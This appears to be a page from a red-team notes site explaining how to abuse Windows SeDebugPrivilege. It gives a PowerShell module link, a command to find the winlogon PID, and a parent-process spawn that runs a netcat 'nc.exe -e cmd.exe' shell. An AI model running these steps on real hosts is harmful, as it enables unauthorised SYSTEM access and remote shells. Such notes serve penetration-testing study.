🧙
Pentesting & Red Teaming Notes
CtrlK
  • Windows
    • Recon - Initial Access
    • Privilege Escalation
      • Enable Privs
      • SeBackupPrivilege
      • SeImpersonatePrivilege
      • SeDebugPrivilege
    • Kerberoasting
    • Lateral Movement
    • MSSQL
    • AD Related
    • Bypass-Evasion Techniques
    • Post Exploitation
    • Miscellaneous
    • UAC Bypass
    • Exploits
      • MS03-026 - RPC DCOM
      • MS04-011 - LSASRV
      • MS08-67 - Netapi
      • MS17-010 - Eternalblue
      • CVE-2019-1388
      • CVE-2020-1472 - Zerologon
      • CVE-2020-16938
      • CVE-2021-1675 - PrintNightmare
      • CVE-2022-21999 - SpoolFool
    • Coerced Auth
  • Linux
  • Abusing Active Directory ACLs
    • ReadLAPSPassword
    • WriteDacl
    • GenericWrite
    • ForceChangePassword
    • WriteOwner
  • Port Forwarding - Tunneling
  • Cloud
  • Mobile
  • Malware Development
    • Process Migration
    • Process Hollowing
    • Dynamic API Resolution
    • Suspended Threads
    • PPID Spoofing
    • Thread Stack Spoofing
    • ETW (Event Tracing for Windows)
    • AMSI Bypass
    • Tools
    • Esoteric
Powered by GitBook
On this page
  1. Windows
  2. Privilege Escalation

SeDebugPrivilege

Most powerful privilege you can get. Easy system shell

You can update update proc attribute list with this privilege and can elevate privileges.

Use the module below to do that.

  • https://github.com/decoder-it/psgetsystem/blob/master/psgetsys.ps1

import-module .\psgetsys.ps1

Find pid of a process that is privileged.

Get-Process winlogon

Use that pid to attach & execute commands

[MyProcess]::CreateProcessFromParent("552","c:\windows\system32\cmd.exe", "/c c:\windows\temp\nc.exe 127.0.0.1 4444 -e cmd.exe")
PreviousSeImpersonatePrivilegeNextKerberoasting

Last updated 3 years ago